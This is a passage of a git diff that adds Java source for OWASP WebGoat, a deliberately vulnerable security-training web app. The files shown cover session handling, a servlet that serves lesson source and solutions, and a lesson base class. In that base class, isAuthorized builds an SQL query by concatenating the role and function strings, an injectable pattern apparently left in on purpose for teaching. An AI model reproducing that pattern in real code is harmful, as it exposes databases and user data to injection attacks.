+     *        The new cacheHeaders value
+     * @param expiry
+     *        The new cacheHeaders value
+     */
+    protected static void setCacheHeaders(HttpServletResponse response,
+	    int expiry)
+    {
+	if (expiry == 0)
+	{
+	    response.setHeader("Pragma", "no-cache");
+	    response.setHeader("Cache-Control", "no-cache");
+	    response.setHeader("Expires", formatHttpDate(new Date()));
+	}
+	else
+	{
+	    Date expiryDate = new Date(System.currentTimeMillis() + expiry);
+	    response.setHeader("Expires", formatHttpDate(expiryDate));
+	}
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param request
+     *        Description of the Parameter
+     * @param response
+     *        Description of the Parameter
+     * @param context
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    protected WebSession updateSession(HttpServletRequest request,
+	    HttpServletResponse response, ServletContext context)
+	    throws IOException
+    {
+	HttpSession hs;
+	hs = request.getSession(true);
+
+	// System.out.println( "HH Entering Session_id: " + hs.getId() );
+	// dumpSession( hs );
+	// Get our session object out of the HTTP session
+	WebSession session = null;
+	Object o = hs.getAttribute(WebSession.SESSION);
+
+	if ((o != null) && o instanceof WebSession)
+	{
+	    session = (WebSession) o;
+	}
+	else
+	{
+	    // Create new custom session and save it in the HTTP session
+	    // System.out.println( "HH Creating new WebSession: " );
+	    session = new WebSession(webgoatContext, context);
+	    hs.setAttribute(WebSession.SESSION, session);
+	    // reset timeout
+	    hs.setMaxInactiveInterval(sessionTimeoutSeconds);
+
+	}
+
+	session.update(request, response, this.getServletName());
+
+	// to authenticate
+	// System.out.println( "HH Leaving Session_id: " + hs.getId() );
+	// dumpSession( hs );
+	return (session);
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param s
+     *        Description of the Parameter
+     * @param response
+     *        Description of the Parameter
+     * @exception IOException
+     *            Description of the Exception
+     */
+    protected void writeScreen(WebSession s, Screen screen, HttpServletResponse response)
+	    throws IOException
+    {
+	response.setContentType("text/html");
+
+	PrintWriter out = response.getWriter();
+
+	if (s == null)
+	{
+	    screen = new ErrorScreen(s, "Page to display was null");
+	}
+
+	// set the content-length of the response.
+	// Trying to avoid chunked-encoding. (Aspect required)
+	response.setContentLength(screen.getContentLength());
+	response.setHeader("Content-Length", screen.getContentLength() + "");
+
+	screen.output(out);
+	out.close();
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
new file mode 100644
index 000000000..f4043bace
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
@@ -0,0 +1,214 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.io.PrintWriter;
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class LessonSource extends HammerHead
+{
+
+	/**
+	 * 
+	 */
+	private static final long serialVersionUID = 2588430536196446145L;
+
+	/**
+	 * Description of the Field
+	 */
+	public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
+
+	public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param request
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @exception IOException
+	 *                Description of the Exception
+	 * @exception ServletException
+	 *                Description of the Exception
+	 */
+	public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException
+	{
+		String source = null;
+
+		try
+		{
+			// System.out.println( "Entering doPost: " );
+			// System.out.println( " - request " + request);
+			// System.out.println( " - principle: " + request.getUserPrincipal()
+			// );
+			// setCacheHeaders(response, 0);
+			WebSession session = (WebSession) request.getSession(true).getAttribute(WebSession.SESSION);
+			// FIXME: Too much in this call.
+			session.update(request, response, this.getServletName());
+
+			boolean showSolution = session.getParser().getBooleanParameter("solution", false);
+			boolean showSource = session.getParser().getBooleanParameter("source", false);
+			if (showSolution)
+			{
+
+				// Get the Java solution of the lesson.
+				source = getSolution(session);
+
+				int scr = session.getCurrentScreen();
+				Course course = session.getCourse();
+				AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
+				lesson.getLessonTracker(session).setViewedSolution(true);
+
+			} else if (showSource) 
+			{
+
+				// Get the Java source of the lesson. FIXME: Not needed
+				source = getSource(session);
+
+				int scr = session.getCurrentScreen();
+				Course course = session.getCourse();
+				AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
+				lesson.getLessonTracker(session).setViewedSource(true);
+			}
+		}
+		catch (Throwable t)
+		{
+			t.printStackTrace();
+			log("ERROR: " + t);
+		}
+		finally
+		{
+			try
+			{
+				this.writeSource(source, response);
+			}
+			catch (Throwable thr)
+			{
+				thr.printStackTrace();
+				log(request, "Could not write error screen: " + thr.getMessage());
+			}
+			// System.out.println( "Leaving doPost: " );
+
+		}
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected String getSource(WebSession s)
+	{
+
+		String source = null;
+		int scr = s.getCurrentScreen();
+		Course course = s.getCourse();
+
+		if (s.isUser() || s.isChallenge())
+		{
+
+			AbstractLesson lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE);
+
+			if (lesson != null)
+			{
+				source = lesson.getSource(s);
+			}
+		}
+		if (source == null)
+		{
+			return "Source code is not available. Contact " + s.getWebgoatContext().getFeedbackAddress();
+		}
+		return (source.replaceAll("(?s)" + START_SOURCE_SKIP + ".*" + END_SOURCE_SKIP,
+								  "Code Section Deliberately Omitted"));
+	}
+
+	protected String getSolution(WebSession s)
+	{
+
+		String source = null;
+		int scr = s.getCurrentScreen();
+		Course course = s.getCourse();
+
+		if (s.isUser() || s.isChallenge())
+		{
+
+			AbstractLesson lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE);
+
+			if (lesson != null)
+			{
+				source = lesson.getSolution(s);
+			}
+		}
+		if (source == null)
+		{
+			return "Solution  is not available. Contact " + s.getWebgoatContext().getFeedbackAddress();
+		}
+		return (source);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @exception IOException
+	 *                Description of the Exception
+	 */
+	protected void writeSource(String s, HttpServletResponse response) throws IOException
+	{
+		response.setContentType("text/html");
+
+		PrintWriter out = response.getWriter();
+
+		if (s == null)
+		{
+			s = new String();
+		}
+
+		out.print(s);
+		out.close();
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
new file mode 100644
index 000000000..f29f60903
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
@@ -0,0 +1,890 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.BufferedReader;
+import java.io.FileReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.io.StringReader;
+import java.net.HttpURLConnection;
+import java.net.URL;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.List;
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Body;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.Head;
+import org.apache.ecs.html.Html;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.html.Title;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.Screen;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.WebgoatContext;
+import org.owasp.webgoat.session.WebgoatProperties;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public abstract class AbstractLesson extends Screen implements Comparable
+{
+
+    /**
+     * Description of the Field
+     */
+    public final static String ADMIN_ROLE = "admin";
+
+    public final static String CHALLENGE_ROLE = "challenge";
+
+    /**
+     * Description of the Field
+     */
+    public final static String HACKED_ADMIN_ROLE = "hacked_admin";
+
+    /**
+     * Description of the Field
+     */
+    public final static String USER_ROLE = "user";
+
+    private static int count = 1;
+
+    private Integer id = null;
+
+    final static IMG nextGrey = new IMG("images/right16.gif").setAlt("Next")
+	    .setBorder(0).setHspace(0).setVspace(0);
+
+    final static IMG previousGrey = new IMG("images/left14.gif").setAlt(
+	    "Previous").setBorder(0).setHspace(0).setVspace(0);
+
+    private Integer ranking;
+
+    private Category category;
+
+    private boolean hidden;
+
+    private String sourceFileName;
+
+    private String lessonPlanFileName;
+
+    private String lessonSolutionFileName;
+
+    private WebgoatContext webgoatContext;
+    
+    /**
+     * Constructor for the Lesson object
+     */
+    public AbstractLesson()
+    {
+    	id = new Integer(++count);
+    }
+
+
+    public String getName()
+    {
+	String className = getClass().getName();
+	return className.substring(className.lastIndexOf('.') + 1);
+    }
+
+
+    public void setRanking(Integer ranking)
+    {
+	this.ranking = ranking;
+    }
+
+
+    public void setHidden(boolean hidden)
+    {
+	this.hidden = hidden;
+    }
+
+    public void update(WebgoatProperties properties)
+    {
+	String className = getClass().getName();
+	className = className.substring(className.lastIndexOf(".") + 1);
+	setRanking(new Integer(properties.getIntProperty("lesson." + className
+		+ ".ranking", getDefaultRanking().intValue())));
+	String categoryRankingKey = "category."
+		+ getDefaultCategory().getName() + ".ranking";
+	// System.out.println("Category ranking key: " + categoryRankingKey);
+	Category tempCategory = Category.getCategory(getDefaultCategory()
+		.getName());
+	tempCategory.setRanking(new Integer(properties.getIntProperty(
+		categoryRankingKey, getDefaultCategory().getRanking()
+			.intValue())));
+	category = tempCategory;
+	setHidden(properties.getBooleanProperty("lesson." + className
+		+ ".hidden", getDefaultHidden()));
+	// System.out.println(className + " in " + tempCategory.getName() + "
+	// (Category Ranking: " + tempCategory.getRanking() + " Lesson ranking:
+	// " + getRanking() + ", hidden:" + hidden +")");
+    }
+
+
+    public boolean isCompleted(WebSession s)
+    {
+	return getLessonTracker(s, this).getCompleted();
+    }
+
+
+    /**
+     * Gets the credits attribute of the AbstractLesson object
+     * 
+     * @return The credits value
+     */
+    public abstract Element getCredits();
+
+    /**
+     * Description of the Method
+     * 
+     * @param obj
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    public int compareTo(Object obj)
+    {
+	return this.getRanking().compareTo(((AbstractLesson) obj).getRanking());
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param obj
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    public boolean equals(Object obj)
+    {
+	return this.getScreenId() == ((AbstractLesson) obj).getScreenId();
+    }
+
+
+    /**
+     * Gets the category attribute of the Lesson object
+     * 
+     * @return The category value
+     */
+    public Category getCategory()
+    {
+	return category;
+    }
+
+
+    protected abstract Integer getDefaultRanking();
+
+
+    protected abstract Category getDefaultCategory();
+
+
+    protected abstract boolean getDefaultHidden();
+
+    /**
+     * Gets the fileMethod attribute of the Lesson class
+     * 
+     * @param reader
+     *        Description of the Parameter
+     * @param methodName
+     *        Description of the Parameter
+     * @param numbers
+     *        Description of the Parameter
+     * @return The fileMethod value
+     */
+    public static String getFileMethod(BufferedReader reader,
+	    String methodName, boolean numbers)
+    {
+	int count = 0;
+	StringBuffer sb = new StringBuffer();
+	boolean echo = false;
+	boolean startCount = false;
+	int parenCount = 0;
+
+	try
+	{
+	    String line;
+
+	    while ((line = reader.readLine()) != null)
+	    {
+		if ((line.indexOf(methodName) != -1)
+			&& ((line.indexOf("public") != -1)
+				|| (line.indexOf("protected") != -1) || (line
+				.indexOf("private") != -1)))
+		{
+		    echo = true;
+		    startCount = true;
+		}
+
+		if (echo && startCount)
+		{
+		    if (numbers)
+		    {
+			sb.append(pad(++count) + "    ");
+		    }
+
+		    sb.append(line + "\n");
+		}
+
+		if (echo && (line.indexOf("{") != -1))
+		{
+		    parenCount++;
+		}
+
+		if (echo && (line.indexOf("}") != -1))
+		{
+		    parenCount--;
+
+		    if (parenCount == 0)
+		    {
+			startCount = false;
+			echo = false;
+		    }
+		}
+	    }
+
+	    reader.close();
+	}
+	catch (Exception e)
+	{
+	    System.out.println(e);
+	    e.printStackTrace();
+	}
+
+	return (sb.toString());
+    }
+
+
+    /**
+     * Reads text from a file into an ElementContainer. Each line in the
+     * file is represented in the ElementContainer by a StringElement. Each
+     * StringElement is appended with a new-line character.
+     * 
+     * @param reader
+     *        Description of the Parameter
+     * @param numbers
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    public static String readFromFile(BufferedReader reader, boolean numbers)
+    {
+	return (getFileText(reader, numbers));
+    }
+
+
+    /**
+     * Gets the fileText attribute of the Screen class
+     * 
+     * @param reader
+     *        Description of the Parameter
+     * @param numbers
+     *        Description of the Parameter
+     * @return The fileText value
+     */
+    public static String getFileText(BufferedReader reader, boolean numbers)
+    {
+	int count = 0;
+	StringBuffer sb = new StringBuffer();
+
+	try
+	{
+	    String line;
+
+	    while ((line = reader.readLine()) != null)
+	    {
+		if (numbers)
+		{
+		    sb.append(pad(++count) + "  ");
+		}
+		sb.append(line + System.getProperty("line.separator"));
+	    }
+
+	    reader.close();
+	}
+	catch (Exception e)
+	{
+	    System.out.println(e);
+	    e.printStackTrace();
+	}
+
+	return (sb.toString());
+    }
+
+
+    /**
+     * Will this screen be included in an enterprise edition.
+     * 
+     * @return The ranking value
+     */
+    public boolean isEnterprise()
+    {
+	return false;
+    }
+
+
+    /**
+     * Gets the hintCount attribute of the Lesson object
+     * @param s The user's WebSession
+     * 
+     * @return The hintCount value
+     */
+    public int getHintCount(WebSession s)
+    {
+	return getHints(s).size();
+    }
+
+
+    protected abstract List<String> getHints(WebSession s);
+
+
+    /**
+     * Fill in a minor hint that will help people who basically get it, but
+     * are stuck on somthing silly.
+     * @param s The users WebSession
+     * 
+     * @return The hint1 value
+     */
+    public String getHint(WebSession s, int hintNumber)
+    {
+	return getHints(s).get(hintNumber);
+    }
+
+
+    /**
+     * Gets the instructions attribute of the AbstractLesson object
+     * 
+     * @return The instructions value
+     */
+    public abstract String getInstructions(WebSession s);
+
+
+    /**
+     * Gets the lessonPlan attribute of the Lesson object
+     * 
+     * @return The lessonPlan value
+     */
+    protected String getLessonName()
+    {
+	int index = this.getClass().getName().indexOf("lessons.");
+	return this.getClass().getName().substring(index + "lessons.".length());
+    }
+
+
+    /**
+     * Gets the title attribute of the HelloScreen object
+     * 
+     * @return The title value
+     */
+    public abstract String getTitle();
+
+
+    /**
+     * Gets the content of lessonPlanURL
+     * 
+     * @param s
+     *        The user's WebSession
+     * 
+     * @return The HTML content of the current lesson plan
+     */
+    public String getLessonPlan(WebSession s)
+    {
+	String src = null;
+
+	try
+	{
+	    // System.out.println("Loading lesson plan file: " +
+	    // getLessonPlanFileName());
+	    src = readFromFile(new BufferedReader(new FileReader(s
+		    .getWebResource(getLessonPlanFileName()))), false);
+
+	}
+	catch (Exception e)
+	{
+	    // s.setMessage( "Could not find lesson plan for " +
+	    // getLessonName());
+	    src = ("Could not find lesson plan for: " + getLessonName());
+
+	}
+	return src;
+    }
+
+
+    /**
+     * Gets the ranking attribute of the Lesson object
+     * 
+     * @return The ranking value
+     */
+    public Integer getRanking()
+    {
+	if (ranking != null)
+	{
+	    return ranking;
+	}
+	else
+	{
+	    return getDefaultRanking();
+	}
+    }
+
+
+    /**
+     * Gets the hidden value of the Lesson Object
+     * 
+     * @return The hidden value
+     */
+    public boolean getHidden()
+    {
+	return this.hidden;
+    }
+
+
+    /**
+     * Gets the role attribute of the AbstractLesson object
+     * 
+     * @return The role value
+     */
+    public String getRole()
+    {
+	// FIXME: Each lesson should have a role assigned to it. Each
+	// user/student
+	// should also have a role(s) assigned. The user would only be allowed
+	// to see lessons that correspond to their role. Eventually these roles
+	// will be stored in the internal database. The user will be able to
+	// hack
+	// into the database and change their role. This will allow the user to
+	// see the admin screens, once they figure out how to turn the admin
+	// switch on.
+	return USER_ROLE;
+    }
+
+
+    /**
+     * Gets the uniqueID attribute of the AbstractLesson object
+     * 
+     * @return The uniqueID value
+     */
+    public int getScreenId()
+    {
+	return id.intValue();
+    }
+
+
+    public String getHtml_DELETE_ME(WebSession s)
+    {
+	String html = null;
+
+	// FIXME: This doesn't work for the labs since they do not implement
+	// createContent().
+	String rawHtml = createContent(s).toString();
+	// System.out.println("Getting raw html content: " +
+	// rawHtml.substring(0, Math.min(rawHtml.length(), 100)));
+	html = convertMetachars(AbstractLesson.readFromFile(new BufferedReader(
+		new StringReader(rawHtml)), true));
+	// System.out.println("Getting encoded html content: " +
+	// html.substring(0, Math.min(html.length(), 100)));
+
+	return html;
+    }
+
+
+    public String getSource(WebSession s)
+    {
+	String source = null;
+	String src = null;
+
+	try
+	{
+	    // System.out.println("Loading source file: " +
+	    // getSourceFileName());
+	    src = convertMetacharsJavaCode(readFromFile(new BufferedReader(
+		    new FileReader(s.getWebResource(getSourceFileName()))),
+		    true));
+
+	    // TODO: For styled line numbers and better memory efficiency,
+	    // use a custom FilterReader
+	    // that performs the convertMetacharsJavaCode() transform plus
+	    // optionally adds a styled
+	    // line number. Wouldn't color syntax be great too?
+	}
+	catch (IOException e)
+	{
+	    s.setMessage("Could not find source file");
+	    src = ("Could not find source file");
+	}
+
+	Html html = new Html();
+
+	Head head = new Head();
+	head.addElement(new Title(getSourceFileName()));
+
+	Body body = new Body();
+	body.addElement(new StringElement(src));
+
+	html.addElement(head);
+	html.addElement(body);
+
+	source = html.toString();
+
+	return source;
+    }
+
+
+    public String getSolution(WebSession s)
+    {
+	String src = null;
+
+	try
+	{
+	    src = readFromFile(new BufferedReader(
+		    new FileReader(s.getWebResource(getLessonSolutionFileName()))),
+		    false);
+	}
+	catch (IOException e)
+	{
+	    s.setMessage("Could not find the solution file");
+	    src = ("Could not find the solution file");
+	}
+
+	Html html = new Html();
+
+	Head head = new Head();
+	head.addElement(new Title(getLessonSolutionFileName()));
+
+	Body body = new Body();
+	body.addElement(new StringElement(src));
+
+	html.addElement(head);
+	html.addElement(body);
+
+	return src;
+    }
+
+    
+    /**
+     * Get the link that can be used to request this screen.
+     * 
+     * @return
+     */
+    public String getLink()
+    {
+	StringBuffer link = new StringBuffer();
+
+	link.append("attack?");
+	link.append(WebSession.SCREEN);
+	link.append("=");
+	link.append(getScreenId());
+	link.append("&");
+	link.append(WebSession.MENU);
+	link.append("=");
+	link.append(getCategory().getRanking());
+	return link.toString();
+    }
+
+
+    /**
+     * Get the link to the jsp page used to render this screen.
+     * 
+     * @return
+     */
+    public String getPage(WebSession s)
+    {
+	return null;
+    }
+
+
+    /**
+     * Get the link to the jsp template page used to render this screen.
+     * 
+     * @return
+     */
+    public String getTemplatePage(WebSession s)
+    {
+	return null;
+    }
+
+
+    public abstract String getCurrentAction(WebSession s);
+
+
+    public abstract void setCurrentAction(WebSession s, String lessonScreen);
+
+    /**
+     * Override this method to implement accesss control in a lesson.
+     * 
+     * @param s
+     * @param functionId
+     * @return
+     */
+    public boolean isAuthorized(WebSession s, int employeeId, String functionId)
+    {
+	return false;
+    }
+
+
+    /**
+     * Override this method to implement accesss control in a lesson.
+     * 
+     * @param s
+     * @param functionId
+     * @return
+     */
+    public boolean isAuthorized(WebSession s, String role, String functionId)
+    {
+	boolean authorized = false;
+	try
+	{
+	    String query = "SELECT * FROM auth WHERE role = '" + role
+		    + "' and functionid = '" + functionId + "'";
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		authorized = answer_results.first();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error authorizing");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error authorizing");
+	    e.printStackTrace();
+	}
+	return authorized;
+    }
+
+
+    public int getUserId(WebSession s) throws ParameterNotFoundException
+    {
+	return -1;
+    }
+
+
+    public String getUserName(WebSession s) throws ParameterNotFoundException
+    {
+	return null;
+    }
+
+    /**
+     * Description of the Method
+     * 
+     * @param windowName
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    public static String makeWindowScript(String windowName)
+    {
+	// FIXME: make this string static
+	StringBuffer script = new StringBuffer();
+	script.append("<script language=\"JavaScript\">\n");
+	script.append("	<!--\n");
+	script.append("	  function makeWindow(url) {\n");
+	script.append("\n");
+	script.append("	      agent = navigator.userAgent;\n");
+	script.append("\n");
+	script.append("	      params  = \"\";\n");
+	script.append("	      params += \"toolbar=0,\";\n");
+	script.append("	      params += \"location=0,\";\n");
+	script.append("	      params += \"directories=0,\";\n");
+	script.append("	      params += \"status=0,\";\n");
+	script.append("	      params += \"menubar=0,\";\n");
+	script.append("	      params += \"scrollbars=1,\";\n");
+	script.append("	      params += \"resizable=1,\";\n");
+	script.append("	      params += \"width=500,\";\n");
+	script.append("	      params += \"height=350\";\n");
+	script.append("\n");
+	script.append("		  // close the window to vary the window size\n");
+	script
+		.append("	   	  if (typeof(win) == \"object\" && !win.closed){\n");
+	script.append("            win.close();\n");
+	script.append("	      }\n");
+	script.append("\n");
+	script.append("	      win = window.open(url, '" + windowName
+		+ "' , params);\n");
+	script.append("\n");
+	script.append(" 		  // bring the window to the front\n");
+	script.append("		  win.focus();\n");
+	script.append("	  }\n");
+	script.append("	//-->\n");
+	script.append("	</script>\n");
+
+	return script.toString();
+    }
+
+
+    /**
+     * Simply reads a url into an Element for display. CAUTION: you might
+     * want to tinker with any non-https links (href)
+     * 
+     * @param url
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    public static Element readFromURL(String url)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    URL u = new URL(url);
+	    HttpURLConnection huc = (HttpURLConnection) u.openConnection();
+	    BufferedReader reader = new BufferedReader(new InputStreamReader(
+		    huc.getInputStream()));
+	    String line;
+
+	    while ((line = reader.readLine()) != null)
+	    {
+		ec.addElement(new StringElement(line));
+	    }
+
+	    reader.close();
+	}
+	catch (Exception e)
+	{
+	    System.out.println(e);
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param reader
+     *        Description of the Parameter
+     * @param numbers
+     *        Description of the Parameter
+     * @param methodName
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    public static Element readMethodFromFile(BufferedReader reader,
+	    String methodName, boolean numbers)
+    {
+	PRE pre = new PRE().addElement(getFileMethod(reader, methodName,
+		numbers));
+
+	return (pre);
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param s
+     *        Description of the Parameter
+     */
+    public void handleRequest(WebSession s)
+    {
+	// call createContent first so messages will go somewhere
+
+	Form form = new Form(getFormAction(), Form.POST).setName("form")
+		.setEncType("");
+
+	form.addElement(createContent(s));
+
+	setContent(form);
+    }
+
+
+    public String getFormAction()
+    {
+	return getLink();
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param s
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+ 
+    public String toString()
+    {
+	return getTitle();
+    }
+
+
+    public String getLessonPlanFileName()
+    {
+	return lessonPlanFileName;
+    }
+
+
+    public void setLessonPlanFileName(String lessonPlanFileName)
+    {
+	this.lessonPlanFileName = lessonPlanFileName;
+    }
+
+    public String getLessonSolutionFileName()
+    {
+	return lessonSolutionFileName;
+    }
+
+
+    public void setLessonSolutionFileName(String lessonSolutionFileName)
+    {
+	this.lessonSolutionFileName = lessonSolutionFileName;
+    }
+
+    public String getSourceFileName()
+    {
+	return sourceFileName;
+    }
+
+
+    public void setSourceFileName(String sourceFileName)
+    {
+	// System.out.println("Setting source file of lesson " + this + " to: "
+	// + sourceFileName);
+	this.sourceFileName = sourceFileName;
+    }
+
+
+	public WebgoatContext getWebgoatContext() {
+		return webgoatContext;
+	}
+
+
+	public void setWebgoatContext(WebgoatContext webgoatContext) {
+		this.webgoatContext = webgoatContext;
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
new file mode 100644
index 000000000..c13cbcc4a
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AccessControlMatrix.java
@@ -0,0 +1,284 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+
+public class AccessControlMatrix extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+    private final static String RESOURCE = "Resource";
+
+    private final static String USER = "User";
+
+    private final static String[] resources = { "Public Share",
+	    "Time Card Entry", "Performance Review", "Time Card Approval",
+	    "Site Manager", "Account Manager" };
+
+    private final static String[] roles = { "Public", "User", "Manager",
+	    "Admin" };
+
+    private final static String[] users = { "Moe", "Larry", "Curly", "Shemp" };
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+	
+		try
+		{
+		    String user = s.getParser().getRawParameter(USER, users[0]);
+		    String resource = s.getParser().getRawParameter(RESOURCE, resources[0]);
+		    String credentials = getRoles(user).toString();
+			
+		    Table t = new Table().setCellSpacing(0).setCellPadding(2)
+			.setBorder(0).setWidth("90%").setAlign("center");
+
+    		if (s.isColor())
+    		{
+    		    t.setBorder(1);
+    		}
+
+    		TR tr = new TR();
+		    tr.addElement(new TD().addElement("Change user:"));
+		    tr.addElement(new TD().addElement(ECSFactory.makePulldown(USER, users, user, 1)));
+		    t.addElement(tr);
+	
+		    // These two lines would allow the user to select the resource from a  list
+		    // Didn't seem right to me so I made them type it in.
+		    //	ec.addElement( new P().addElement( "Choose a resource:" ) );
+		    //	ec.addElement( ECSFactory.makePulldown( RESOURCE, resources, resource, 1 ) );
+    		tr = new TR();
+		    tr.addElement(new TD().addElement("Select resource: "));
